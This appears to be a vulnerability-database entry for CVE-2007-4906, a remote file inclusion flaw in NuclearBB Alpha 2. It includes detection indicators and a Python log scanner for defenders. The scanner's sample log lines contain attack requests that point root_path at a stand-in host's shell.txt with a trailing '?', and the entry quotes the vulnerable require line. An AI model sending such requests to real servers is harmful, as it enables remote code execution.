CVE-2007-4906
Published 2007-09-17
Priority: P3 44 · medium · 6.8 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available (see references)
EPSS: 38.38% (98.4th percentile)
PHP remote file inclusion vulnerability in tasks/send_queued_emails.php in NuclearBB Alpha 2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nuclearbb | nuclearbb | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP GET requests to send_queued_emails.php containing a URL (http:// or https://) in the root_path parameter, which indicates an RFI exploitation attempt.
- The trailing '?' appended to the injected URL (e.g., shell.txt?) is a classic RFI technique to nullify the appended local path string; detect this pattern in query strings targeting root_path.
- The vulnerable code path is line 14 of send_queued_emails.php: require("$root_path/inc/functions_email.php"); — any unsanitised URL value in root_path will be remotely included.
- Exploitation requires register_globals to be enabled on the target server; correlate findings with server configuration checks for register_globals=On.
- This vulnerability is only exploitable when PHP's register_globals directive is enabled (On). Servers with register_globals=Off are not affected.
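Detection logic for the indicators above, written as an added example and not taken from the indexed sources: it scans constructed combined-format web access-log lines (placeholder hosts and paths) for GET requests to send_queued_emails.php whose root_path value is a remote http/https URL, and flags the trailing '?' suffix separately.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not real traffic); hosts and paths are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Sep/2007:10:01:02 +0000] "GET /nuclearbb/tasks/send_queued_emails.php HTTP/1.1" 200 512
203.0.113.5 - - [17/Sep/2007:10:01:03 +0000] "GET /nuclearbb/tasks/send_queued_emails.php?root_path=/var/www/nuclearbb HTTP/1.1" 200 512
198.51.100.7 - - [17/Sep/2007:10:02:11 +0000] "GET /nuclearbb/tasks/send_queued_emails.php?root_path=http://attacker.invalid/shell.txt? HTTP/1.1" 200 1024
198.51.100.7 - - [17/Sep/2007:10:02:12 +0000] "GET /nuclearbb/tasks/send_queued_emails.php?root_path=https%3A%2F%2Fattacker.invalid%2Fshell.txt%3F HTTP/1.1" 200 1024
192.0.2.9 - - [17/Sep/2007:10:03:00 +0000] "GET /nuclearbb/index.php?redirect=http://example.com/ HTTP/1.1" 302 0
"""

# Combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The page's indicator: a remote http:// or https:// URL in root_path.
REMOTE_URL = re.compile(r"^https?://", re.IGNORECASE)


def inspect_target(target):
    """Return (root_path_value, ends_with_question_mark) for an RFI attempt
    against send_queued_emails.php, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/tasks/send_queued_emails.php"):
        return None
    # parse_qs percent-decodes values, so an encoded scheme (http%3A%2F%2F)
    # and an encoded trailing %3F are normalised before matching.
    for value in parse_qs(parts.query, keep_blank_values=True).get("root_path", []):
        if REMOTE_URL.match(value):
            return value, value.endswith("?")
    return None


def scan_log(text):
    """Return one finding per log line that matches the RFI pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        hit = inspect_target(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "root_path": hit[0], "null_suffix": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} root_path={f['root_path']} trailing_?={f['null_suffix']}")
```

Only the two requests from 198.51.100.7 are reported; the local root_path value and the unrelated index.php redirect are not. Pair hits with a configuration check for register_globals=On to confirm exposure.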
No detection rules found.
No writeups or analysis indexed.
References
- http://osvdb.org/38978
- http://securityreason.com/securityalert/3142
- http://www.securityfocus.com/archive/1/479086/100/0/threaded
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36556
- https://www.exploit-db.com/exploits/4395